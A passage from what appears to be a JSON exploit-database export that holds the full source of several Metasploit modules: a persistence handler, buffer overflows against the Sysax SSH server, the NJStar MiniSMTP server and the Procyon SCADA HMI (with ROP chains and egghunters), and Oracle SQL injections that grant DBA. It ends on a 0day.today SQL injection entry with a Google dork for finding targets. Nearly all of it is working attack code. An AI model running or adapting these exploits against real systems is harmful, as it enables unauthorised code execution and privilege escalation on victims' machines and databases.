payload on target\")\n execsuccess = false\n end\n\n execsuccess\n end\n\n # Starts a exploit/multi/handler session\n def create_multihandler(lhost, lport, payload_name)\n pay = client.framework.payloads.create(payload_name)\n pay.datastore['LHOST'] = 
lhost\n pay.datastore['LPORT'] = lport\n print_status('Starting exploit/multi/handler')\n\n unless check_for_listener(lhost, lport)\n # Set options for module\n mh = client.framework.exploits.create('multi/handler')\n mh.share_datastore(pay.datastore)\n mh.datastore['WORKSPACE'] = client.workspace\n mh.datastore['PAYLOAD'] = payload_name\n mh.datastore['EXITFUNC'] = 'thread'\n mh.datastore['ExitOnSession'] = true\n # Validate module options\n mh.options.validate(mh.datastore)\n # Execute showing output\n mh.exploit_simple(\n 'Payload' => mh.datastore['PAYLOAD'],\n 'LocalInput' => self.user_input,\n 'LocalOutput' => self.user_output,\n 'RunAsJob' => true\n )\n\n # Check to make sure that the handler is actually valid\n # If another process has the port open, then the handler will fail\n # but it takes a few seconds to do so. The module needs to give\n # the handler time to fail or the resulting connections from the\n # target could end up on on a different handler with the wrong payload\n # or dropped entirely.\n Rex.sleep(5)\n return nil if framework.jobs[mh.job_id.to_s].nil?\n\n return mh.job_id.to_s\n else\n print_error('A job is listening on the same local port')\n return nil\n end\n end\n\n # Method for checking if a listener for a given IP and port is present\n # will return true if a conflict exists and false if none is found\n def check_for_listener(lhost, lport)\n client.framework.jobs.each do |k, j|\n if j.name =~ / multi\\/handler/\n current_id = j.jid\n current_lhost = j.ctx[0].datastore['LHOST']\n current_lport = j.ctx[0].datastore['LPORT']\n if lhost == current_lhost && lport == current_lport.to_i\n print_error(\"Job #{current_id} is listening on IP #{current_lhost} and port #{current_lport}\")\n return true\n end\n end\n end\n false\n end\n\n # Function for creating log folder and returning log path\n def log_file(log_path = nil)\n # Get hostname\n host = session.sys.config.sysinfo[\"Computer\"]\n\n # Create Filename info to be appended to downloaded 
files\n filenameinfo = \"_\" + ::Time.now.strftime(\"%Y%m%d.%M%S\")\n\n # Create a directory for the logs\n if log_path\n logs = ::File.join(log_path, 'logs', 'persistence',\n Rex::FileUtils.clean_path(host + filenameinfo))\n else\n logs = ::File.join(Msf::Config.log_directory, 'persistence',\n Rex::FileUtils.clean_path(host + filenameinfo))\n end\n\n # Create the log directory\n ::FileUtils.mkdir_p(logs)\n\n # logfile name\n logfile = logs + ::File::Separator + Rex::FileUtils.clean_path(host + filenameinfo) + \".rc\"\n logfile\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/local/persistence.rb"}, {"lastseen": "2019-12-07T09:32:12", "bulletinFamily": "exploit", "description": "This module exploits a vulnerability found in Sysax's SSH service. By supplying a long username, the SSH server will copy that data on the stack without proper bounds checking, therefore allowing remote code execution under the context of the user. Please note that previous versions (before 5.53) are also affected by this bug.\n", "modified": "2018-08-15T21:54:41", "published": "2012-03-03T16:11:51", "id": "MSF:EXPLOIT/WINDOWS/MISC/HP_DATAPROTECTOR_INSTALL_SERVICE", "href": "", "type": "metasploit", "title": "Sysax 5.53 SSH Username Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::Tcp\n include Msf::Exploit::Remote::SSH\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => \"Sysax 5.53 SSH Username Buffer Overflow\",\n 'Description' => %q{\n This module exploits a vulnerability found in Sysax's SSH service. 
By\n supplying a long username, the SSH server will copy that data on the stack\n without proper bounds checking, therefore allowing remote code execution\n under the context of the user. Please note that previous versions\n (before 5.53) are also affected by this bug.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Craig Freyman', # Initial discovery, PoC\n 'sinn3r' # Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '79689'],\n ['URL', 'http://www.pwnag3.com/2012/02/sysax-multi-server-ssh-username-exploit.html'],\n ['EDB', '18535']\n ],\n 'Payload' =>\n {\n 'Space' => 1024,\n 'BadChars' => \"\\x00\\x3a\",\n 'StackAdjustment' => -3500\n },\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => \"seh\"\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [\n 'Sysax 5.53 on Win XP SP3 / Win2k3 SP0',\n {\n 'Rop' => false,\n 'Ret' => 0x00402669 # POP/POP/RET - sysaxservd.exe\n }\n ],\n [\n 'Sysax 5.53 on Win2K3 SP1/SP2',\n {\n 'Rop' => true,\n 'Ret' => 0x0046d23c # ADD ESP, 0F8C # RETN\n }\n ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Feb 27 2012\",\n 'DefaultTarget' => 0\n )\n )\n\n register_options(\n [ OptInt.new('RPORT', [false, 'The target port', 22]) ]\n )\n end\n\n def check\n begin\n connect\n banner = sock.get_once(-1, 5) || ''\n disconnect\n vprint_status(\"Banner: #{banner}\")\n if banner.match?(/SSH\\-2\\.0\\-SysaxSSH_1\\.0/)\n return Exploit::CheckCode::Appears\n end\n rescue\n vprint_error(\"An error has occurred while trying to read a response from target\")\n return Exploit::CheckCode::Unknown\n end\n\n Exploit::CheckCode::Safe\n end\n\n def generate_regular_exploit\n #\n # Align the stack to the beginning of the fixed size payload\n #\n align = \"\\x54\" # PUSH ESP\n align << \"\\x58\" # POP EAX\n align << \"\\x04\\x08\" # ADD AL,0x08\n align << \"\\x8b\\x18\" # MOV EBX, [EAX]\n align << \"\\x93\" # XCHG EAX,EBX\n align << \"\\x66\\x2d\\x10\\x04\" # SUB AX,0x361\n align << \"\\x50\" # PUSH EAX\n align << \"\\xc3\" # RET\n\n #\n # Our payload limited 
to 1024+4 bytes\n #\n p = make_nops(4)\n p << payload.encoded\n\n #\n # Craft the buffer like this:\n # [392 bytes][20 bytes][< 9404 bytes][payload][alignment][nseh][seh]\n # * The 20-byte region is where our source IP is written. 20 bytes gives it enough room\n # for the IP length, so the next 9404-byte space will begin at a consistent place.\n # * After SEH, we have ~1860 bytes, but we don't need that because we're doing a\n # partial-overwrite to allow a null byte in SEH.\n #\n buf = ''\n buf << rand_text(392, payload_badchars)\n buf << rand_text(20, payload_badchars)\n buf << rand_text(9204 - buf.length - align.length - p.length, payload_badchars) # 8796+392+20\n buf << p\n buf << align\n buf << \"\\xeb\" + [0 - align.length - 2].pack('c') + make_nops(2) # Short jmp back\n buf << [target.ret].pack('V*')\n buf\n end\n\n def generate_rop_exploit\n junk = rand_text(4).unpack(\"L\")[0].to_i\n nop = make_nops(4).unpack(\"L\")[0].to_i\n\n # !mona rop -m msvcrt\n p =\n [\n 0x77bb2563, # POP EAX # RETN\n 0x77ba1114, # <- *&VirtualProtect()\n 0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN\n junk,\n 0x77bb0c86, # XCHG EAX,ESI # RETN\n 0x77bc9801, # POP EBP # RETN\n 0x77be2265, # ptr to 'push esp # ret'\n 0x77bb2563, # POP EAX # RETN\n 0x03C0990F,\n 0x77bdd441, # SUB EAX, 03c0940f\n 0x77bb48d3, # POP EBX, RET\n 0x77bf21e0, # .data\n 0x77bbf102, # XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN\n 0x77bbfc02, # POP ECX # RETN\n 0x77bef001, # W pointer (lpOldProtect) (-> ecx)\n 0x77bd8c04, # POP EDI # RETN\n 0x77bd8c05, # ROP NOP (-> edi)\n 0x77bb2563, # POP EAX # RETN\n 0x03c0984f,\n 0x77bdd441, # SUB EAX, 03c0940f\n 0x77bb8285, # XCHG EAX,EDX # RETN\n 0x77bb2563, # POP EAX # RETN\n nop,\n 0x77be6591, # PUSHAD # ADD AL,0EF # RETN\n ].pack(\"V*\")\n\n p << payload.encoded\n\n #\n # Similar buffer structure to generate_regular_exploit\n #\n buf = ''\n buf << rand_text(392, payload_badchars)\n buf << rand_text(20, payload_badchars)\n buf << rand_text(1012, 
payload_badchars)\n buf << p\n buf << rand_text(9204 - buf.length)\n buf << rand_text(4, payload_badchars)\n buf << [target.ret].pack('V*')\n buf\n end\n\n def exploit\n #\n # Create buffer based on target (DEP or no DEP)\n # If possible, we still prefer to use the regular version because it's more stable\n #\n if target['Rop']\n buf = generate_rop_exploit\n else\n buf = generate_regular_exploit\n end\n\n #\n # Send the malicious buffer\n #\n pass = rand_text_alpha(8)\n begin\n print_status(\"Sending malicious request to #{rhost}:#{rport}...\")\n factory = ssh_socket_factory\n ssh = Net::SSH.start(\n datastore['RHOST'],\n buf,\n password: pass,\n port: datastore['RPORT'],\n timeout: 1,\n proxy: factory,\n config: false,\n non_interactive: true,\n verify_host_key: :never\n )\n\n ::Timeout.timeout(1) { ssh.close }\n rescue Errno::ECONNREFUSED\n print_error(\"Cannot establish a connection on #{rhost}:#{rport}\")\n return\n rescue StandardError => e\n if e.message.match?(/fingerprint [0-9a-z\\:]+ does not match/)\n print_error(\"Please remove #{rhost}:#{rport} from your known_hosts list\")\n return\n end\n end\n\n handler(ssh)\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/ssh/sysax_ssh_username.rb"}, {"lastseen": "2019-11-06T13:34:17", "bulletinFamily": "exploit", "description": "This module exploits a stack buffer overflow vulnerability in NJStar Communicator Version 3.00 MiniSMTP server. The MiniSMTP application can be seen in multiple NJStar products, and will continue to run in the background even if the software is already shutdown. 
According to the vendor's testimonials, NJStar software is also used by well known companies such as Siemens, NEC, Google, Yahoo, eBay; government agencies such as the FBI, Department of Justice (HK); as well as a long list of universities such as Yale, Harvard, University of Tokyo, etc.\n", "modified": "2017-07-24T13:26:21", "published": "2011-11-01T08:19:55", "id": "MSF:EXPLOIT/WINDOWS/SMTP/NJSTAR_SMTP_BOF", "href": "", "type": "metasploit", "title": "NJStar Communicator 3.00 MiniSMTP Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::Tcp\n include Msf::Exploit::Egghunter\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'NJStar Communicator 3.00 MiniSMTP Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow vulnerability in NJStar Communicator\n Version 3.00 MiniSMTP server. The MiniSMTP application can be seen in multiple\n NJStar products, and will continue to run in the background even if the\n software is already shutdown. 
According to the vendor's testimonials,\n NJStar software is also used by well known companies such as Siemens, NEC,\n Google, Yahoo, eBay; government agencies such as the FBI, Department of\n Justice (HK); as well as a long list of universities such as Yale, Harvard,\n University of Tokyo, etc.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Dillon Beresford', # Original discovery and MSF Module.\n ],\n 'References' =>\n [\n [ 'OSVDB', '76728' ],\n [ 'CVE', '2011-4040' ],\n [ 'URL', 'http://www.njstar.com/cms/njstar-communicator' ],\n [ 'EDB', '18057' ]\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n },\n 'Platform' => 'win',\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'StackAdjustment' => -1500,\n },\n 'Targets' =>\n [\n [\n 'Windows XP SP2/SP3',\n {\n 'Ret' => 0x77c35459, # PUSH ESP; RETN (MSVCRT.dll)\n 'Offset' => 247,\n }\n ],\n [\n # Can't test patch level on this one, because you can't\n # even update Win2k3 SP0 anymore from Windows Update\n 'Windows Server 2003 SP0',\n {\n 'Ret' => 0x77d20738, # JMP ESP (USER32.dll)\n 'Offset' => 247,\n }\n ],\n [\n 'Windows Server 2003 SP1/SP2',\n {\n 'Ret' => 0x77BE2265, # PUSH ESP; RETN (MSVCRT.dll)\n 'Offset' => 247,\n }\n ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => 'Oct 31 2011',\n 'DefaultTarget' => 0))\n\n register_options([Opt::RPORT(25)])\n end\n\n def check\n connect\n # We get a response like: \"220 [host-name] Service Ready\"\n # But we don't really care about this one\n res = sock.get_once(-1, 5)\n vprint_status(\"Banner: #{res.to_s.chop}\")\n\n sock.puts(\"HELP\\r\\n\")\n\n # But the HELP response will tell us if this is a NJStar SMTP or not\n res = sock.get_once(-1, 5)\n vprint_status(\"HELP Response: #{res.to_s.chop}\")\n disconnect\n\n # I can only flag it as \"Detected\" because it doesn't return a version\n if res =~ /Windows E-mail Server From NJStar Software/i\n return Exploit::CheckCode::Detected\n end\n\n return Exploit::CheckCode::Safe\n end\n\n def exploit\n eggoptions 
=\n {\n :checksum => true,\n :eggtag => \"w00t\"\n }\n\n hunter,egg = generate_egghunter(payload.encoded,payload_badchars,eggoptions)\n\n buffer = rand_text(target['Offset'])\n buffer << [target.ret].pack('V')\n buffer << hunter\n buffer << make_nops(4)\n\n # Just some debugging output so we can see lengths and byte size of each of our buffer.\n vprint_status(\"egg: %u bytes: \\n\" % egg.length + Rex::Text.to_hex_dump(egg))\n vprint_status(\"hunter: %u bytes: \\n\" % hunter.length + Rex::Text.to_hex_dump(hunter))\n vprint_status(\"buffer: %u bytes:\\n\" % buffer.length + Rex::Text.to_hex_dump(buffer))\n\n print_status(\"Trying target #{target.name}...\")\n\n # har har har you get trick no treat...\n # we dont have very much space so we\n # send our egg in a seperate connection\n connect\n\n print_status(\"Sending the egg...\")\n sock.put(egg)\n\n # I think you betta call, ghostbusters...\n # now we send our evil buffer along with the\n # egg hunter, we are doing multiple connections\n # to solve the issue with limited stack space.\n # thanks to bannedit for advice on threads and\n # making multiple connections to get around\n # stack space constraints. :)\n connect\n\n print_status(\"Sending our buffer containing the egg hunter...\")\n sock.put(buffer)\n\n handler\n disconnect\n end\nend\n\n\n=begin\nDillon Beresford\nhttps://twitter.com/#!/D1N\n\nNJStar Communicator\nVersion: 3.00 and prior\nBuild: 11818 and prior\n\nTested minismtp version:\n1.30.0.60218\n\nShouts to bannedit, sinn3r, rick2600, tmanning, corelanc0d3r, jcran,\nmanils, d0tslash, mublix, halsten, and everyone at AHA!\n\nNo response as of 10/31/11 from AUSCERT or the software vendor. CNCERT and USCERT responded\non 10/30/11 and 10/31/11, CNCERT said in an email they needed to see if the vulnerability\nis remotely exploitable and needed more verification. I sent a proof of concept exploit\nin python with remote code execution. So, here is the proof that the bug is, in fact,\nremotely exploitable. 
WIN!\n\nSystem DLLs are used for target.ret because minismtp.exe is the only NJStar component in\nmemory, and its base starts with a 0x00, that's no good. However, if your target machine\nstarted minismtp from the Windows start menu (Start -> All Programs -> NJStar Communicator\n-> NJStar MiniSmtp), it'd actually load up more DLLs. And one of them -- MSVCR100.dll -- is\nideal enough to use (No rebase, starts with a high address, but there is an ASLR flag).\n\neax=00000000 ebx=00417bf8 ecx=00002745 edx=00000000 esi=008a3e50\nedi=008a3d80\neip=42424242 esp=00ccff70 ebp=7c8097d0 iopl=0 nv up ei pl nz na pe nc\ncs=001b\t ss=0023 ds=0023 es=0023\tfs=003b\t gs=0000\nefl=00010206\n42424242 ?? ???\n0:003> !exchain\nimage00400000+bbc4 (0040bbc4)\n00ccff00: 41414141\nInvalid exception stack at 41414141\n0:003> d esp\n00ccff70 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD\n00ccff80 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD\n00ccff90 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD\n00ccffa0 44 44 44 44 00 ff cc 00-c4 bb 40 00 20 23 41 00 DDDD......@. #A.\n00ccffb0 00 00 00 00 ec ff cc 00-29 b7 80 7c b8 3d 8a 00 ........)..|.=..\n00ccffc0 00 00 00 00 00 00 00 00-b8 3d 8a 00 00 c0 fd 7f .........=......\n00ccffd0 00 d6 e3 89 c0 ff cc 00-98 08 99 89 ff ff ff ff ................\n00ccffe0 d8 9a 83 7c 30 b7 80 7c-00 00 00 00 00 00 00 00 ...|0..|........\n\n=end\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/smtp/njstar_smtp_bof.rb"}, {"lastseen": "2019-12-04T10:05:44", "bulletinFamily": "exploit", "description": "This module exploits a vulnerability in the coreservice.exe component of Proycon Core Server <= v1.13. While processing a password, the application fails to do proper bounds checking before copying data into a small buffer on the stack. 
This causes a buffer overflow and allows to overwrite a structured exception handling record on the stack, allowing for unauthenticated remote code execution. Also, after the payload exits, Coreservice.exe should automatically recover.\n", "modified": "2017-07-24T13:26:21", "published": "2011-09-12T17:54:31", "id": "MSF:EXPLOIT/WINDOWS/SCADA/PROCYON_CORE_SERVER", "href": "", "type": "metasploit", "title": "Procyon Core Server HMI Coreservice.exe Stack Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::Egghunter\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Procyon Core Server HMI Coreservice.exe Stack Buffer Overflow\",\n 'Description' => %q{\n This module exploits a vulnerability in the coreservice.exe component of Proycon\n Core Server <= v1.13. While processing a password, the application\n fails to do proper bounds checking before copying data into a small buffer on the stack.\n This causes a buffer overflow and allows to overwrite a structured exception handling\n record on the stack, allowing for unauthenticated remote code execution. 
Also, after the\n payload exits, Coreservice.exe should automatically recover.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Knud Hojgaard <keh[at]nsense.dk>', # Initial discovery\n 'mr_me <steventhomasseeley[at]gmail.com>', # Initial discovery & poc/msf\n ],\n 'References' =>\n [\n ['CVE', '2011-3322'],\n ['OSVDB', '75371'],\n ['URL', 'http://www.stratsec.net/Research/Advisories/Procyon-Core-Server-HMI-Remote-Stack-Overflow']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\\x0a\\x0d\",\n },\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n\n [\n 'Windows XP SP3 - No dep bypass',\n {\n 'Ret' => 0x774699bf, # JMP ESP [user32.dll]\n 'Edx' => 0x1D847770, # 0x7712dec2 -> 0x00700040 RW [oleaut32.dll]\n 'Eax' => 0x01010106, # 0x7712dec2 -> 0x00700040 RW [oleaut32.dll]\n 'Offset' => 8\n }\n ],\n ],\n 'Privileged' => true,\n 'DisclosureDate' => \"Sep 08 2011\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n Opt::RPORT(23)\n ])\n end\n\n def check\n connect\n res = (sock.get_once || '').chomp #This gives us string \"----------------------------\"\n res = (sock.get_once || '').chomp #This gives us the actual software version\n disconnect\n\n if res =~ /Core Command Interface V1\\.(.*)2/\n return Exploit::CheckCode::Appears\n end\n\n return Exploit::CheckCode::Safe\n end\n\n def exploit\n\n eggoptions =\n {\n :checksum => false,\n :eggtag => 'ssec',\n }\n\n badchars = \"\\x00\\x0a\\x0d\"\n hunter,egg = generate_egghunter(payload.encoded, badchars, eggoptions)\n\n sploit = rand_text_alpha_upper(45)\n sploit << [target['Edx']].pack('V')\n sploit << [0x41414141].pack('V')\n sploit << [target['Eax']].pack('V')\n sploit << rand_text_alpha_upper(target['Offset'])\n sploit << [target.ret].pack('V')\n sploit << make_nops(10)\n sploit << hunter\n sploit << rand_text_alpha_upper(500)\n sploit << egg\n sploit << \"\\r\\n\"\n\n connect\n sock.get_once()\n print_status(\"Sending request...\")\n sock.put(sploit)\n 
handler()\n disconnect\n\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/scada/procyon_core_server.rb"}, {"lastseen": "2019-10-20T17:49:32", "bulletinFamily": "exploit", "description": "This module will escalate a Oracle DB user to DBA by exploiting an sql injection bug in the SYS.DBMS_METADATA.OPEN package/function.\n", "modified": "2017-07-24T13:26:21", "published": "2009-07-28T13:43:37", "id": "MSF:AUXILIARY/SQLI/ORACLE/DBMS_METADATA_OPEN", "href": "", "type": "metasploit", "title": "Oracle DB SQL Injection via SYS.DBMS_METADATA.OPEN", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::ORACLE\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Oracle DB SQL Injection via SYS.DBMS_METADATA.OPEN',\n 'Description' => %q{\n This module will escalate a Oracle DB user to DBA by exploiting an sql injection\n bug in the SYS.DBMS_METADATA.OPEN package/function.\n },\n 'Author' => [ 'MC' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'URL', 'http://www.metasploit.com' ],\n ],\n 'DisclosureDate' => 'Jan 5 2008'))\n\n register_options(\n [\n OptString.new('SQL', [ false, 'SQL to execute.', \"GRANT DBA to #{datastore['DBUSER']}\"]),\n ])\n end\n\n def run\n return if not check_dependencies\n\n name = Rex::Text.rand_text_alpha(rand(10) + 1)\n\n function = \"\n create or replace function #{datastore['DBUSER']}.#{name} return varchar2\n authid current_user is pragma autonomous_transaction;\n begin\n execute immediate '#{datastore['SQL']}';\n return '';\n end;\n \"\n\n package = \"select sys.dbms_metadata.open('''||#{datastore['DBUSER']}.#{name}()||''') from dual\"\n\n clean = \"drop function #{name}\"\n\n\n print_status(\"Sending function...\")\n 
prepare_exec(function)\n\n begin\n print_status(\"Attempting sql injection on SYS.DBMS_METADATA.OPEN...\")\n prepare_exec(package)\n rescue ::OCIError => e\n if ( e.to_s =~ /ORA-24374: define not done before fetch or execute and fetch/ )\n print_status(\"Removing function '#{name}'...\")\n prepare_exec(clean)\n else\n end\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/sqli/oracle/dbms_metadata_open.rb"}, {"lastseen": "2019-11-20T21:04:13", "bulletinFamily": "exploit", "description": "This module will escalate an Oracle DB user to DBA by exploiting a sql injection bug in the SYS.DBMS_METADATA.GET_GRANTED_XML package/function.\n", "modified": "2017-08-29T00:17:58", "published": "2009-07-28T13:43:37", "id": "MSF:AUXILIARY/SQLI/ORACLE/DBMS_METADATA_GET_GRANTED_XML", "href": "", "type": "metasploit", "title": "Oracle DB SQL Injection via SYS.DBMS_METADATA.GET_GRANTED_XML", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::ORACLE\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Oracle DB SQL Injection via SYS.DBMS_METADATA.GET_GRANTED_XML',\n 'Description' => %q{\n This module will escalate an Oracle DB user to DBA by exploiting a sql injection\n bug in the SYS.DBMS_METADATA.GET_GRANTED_XML package/function.\n },\n 'Author' => [ 'MC' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'URL', 'http://www.metasploit.com' ],\n ],\n 'DisclosureDate' => 'Jan 5 2008'))\n\n register_options(\n [\n OptString.new('SQL', [ false, 'SQL to execute.', \"GRANT DBA to #{datastore['DBUSER']}\"]),\n ])\n end\n\n def run\n return if not check_dependencies\n\n name = Rex::Text.rand_text_alpha(rand(10) + 1)\n\n function = \"\n create or replace function #{datastore['DBUSER']}.#{name} 
return varchar2\n authid current_user is pragma autonomous_transaction;\n begin\n execute immediate '#{datastore['SQL']}';\n return '';\n end;\n \"\n\n package = \"select sys.dbms_metadata.get_granted_xml('''||#{datastore['DBUSER']}.#{name}()||''') from dual\"\n\n clean = \"drop function #{name}\"\n\n print_status(\"Sending function...\")\n prepare_exec(function)\n\n begin\n print_status(\"Attempting sql injection on SYS.DBMS_METADATA.GET_GRANTED_XML...\")\n prepare_exec(package)\n rescue ::OCIError => e\n print_status(\"Removing function '#{name}'...\")\n prepare_exec(clean)\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/sqli/oracle/dbms_metadata_get_granted_xml.rb"}, {"lastseen": "2019-12-01T17:45:46", "bulletinFamily": "exploit", "description": "This module will escalate an Oracle DB user to DBA by exploiting a sql injection bug in the SYS.DBMS_METADATA.GET_XML package/function.\n", "modified": "2017-08-29T00:17:58", "published": "2009-07-28T13:43:37", "id": "MSF:AUXILIARY/SQLI/ORACLE/DBMS_METADATA_GET_XML", "href": "", "type": "metasploit", "title": "Oracle DB SQL Injection via SYS.DBMS_METADATA.GET_XML", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::ORACLE\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Oracle DB SQL Injection via SYS.DBMS_METADATA.GET_XML',\n 'Description' => %q{\n This module will escalate an Oracle DB user to DBA by exploiting a sql injection\n bug in the SYS.DBMS_METADATA.GET_XML package/function.\n },\n 'Author' => [ 'MC' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'URL', 'http://www.metasploit.com' ],\n ],\n 'DisclosureDate' => 'Jan 5 2008'))\n\n register_options(\n [\n OptString.new('SQL', [ false, 'SQL to execute.', 
\"GRANT DBA to #{datastore['DBUSER']}\"]),\n ])\n end\n\n def run\n return if not check_dependencies\n\n name = Rex::Text.rand_text_alpha(rand(10) + 1)\n\n function = \"\n create or replace function #{datastore['DBUSER']}.#{name} return varchar2\n authid current_user is pragma autonomous_transaction;\n begin\n execute immediate '#{datastore['SQL']}';\n return '';\n end;\n \"\n\n package = \"select sys.dbms_metadata.get_xml('''||#{datastore['DBUSER']}.#{name}()||''','') from dual\"\n\n clean = \"drop function #{name}\"\n\n print_status(\"Sending function...\")\n prepare_exec(function)\n\n begin\n print_status(\"Attempting sql injection on SYS.DBMS_METADATA.GET_XML...\")\n prepare_exec(package)\n rescue ::OCIError => e\n print_status(\"Removing function '#{name}'...\")\n prepare_exec(clean)\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/sqli/oracle/dbms_metadata_get_xml.rb"}], "zdt": [{"lastseen": "2018-03-01T21:38:56", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2012-09-11T00:00:00", "published": "2012-09-11T00:00:00", "id": "1337DAY-ID-19383", "href": "https://0day.today/exploit/description/19383", "type": "zdt", "title": "ANTEMENE SQL Injection Vulnerability", "sourceData": "1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0\r\n0 _ __ __ __ 1\r\n1 /' \\ __ /'__`\\ /\\ \\__ /'__`\\ 0\r\n0 /\\_, \\ ___ /\\_\\/\\_\\ \\ \\ ___\\ \\ ,_\\/\\ \\/\\ \\ _ ___ 1\r\n1 \\/_/\\ \\ /' _ `\\ \\/\\ \\/_/_\\_<_ /'___\\ \\ \\/\\ \\ \\ \\ \\/\\`'__\\ 0\r\n0 \\ \\ \\/\\ \\/\\ \\ \\ \\ \\/\\ \\ \\ \\/\\ \\__/\\ \\ \\_\\ \\ \\_\\ \\ \\ \\/ 1\r\n1 \\ \\_\\ \\_\\ \\_\\_\\ \\ \\ \\____/\\ \\____\\\\ \\__\\\\ \\____/\\ \\_\\ 0\r\n0 \\/_/\\/_/\\/_/\\ \\_\\ \\/___/ \\/____/ \\/__/ \\/___/ \\/_/ 1\r\n1 \\ \\____/ >> Exploit database separated by exploit 0\r\n0 \\/___/ type (local, remote, DoS, 
etc.) 1\r\n1 1\r\n0 [+] Site : 1337day.com 0\r\n1 [+] Support e-mail : submit[at]1337day.com 1\r\n0 0\r\n1 ######################################### 1\r\n0 I'm TUNISIAN CYBER member from Inj3ct0r Team 1\r\n1 ######################################### 0\r\n0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1\r\n[+] Author: TUNISIAN CYBER\r\n[+] Home: 1337day.com Inj3ct0r Exploit DataBase\r\n[+] Exploit Title: ANTEMENE SQL Injection Vulnerability\r\n[+] Date: 10-09-2012\r\n[+] Category: WebApp\r\n[+] Google Dork: intext:\"Cr\u00e9ation internet et r\u00e9f\u00e9rencement web / Agence web \" article.php\r\n[+] Tested on: Windows 7 Professionnel / Windows Server 2008\r\n[+] Vendor: 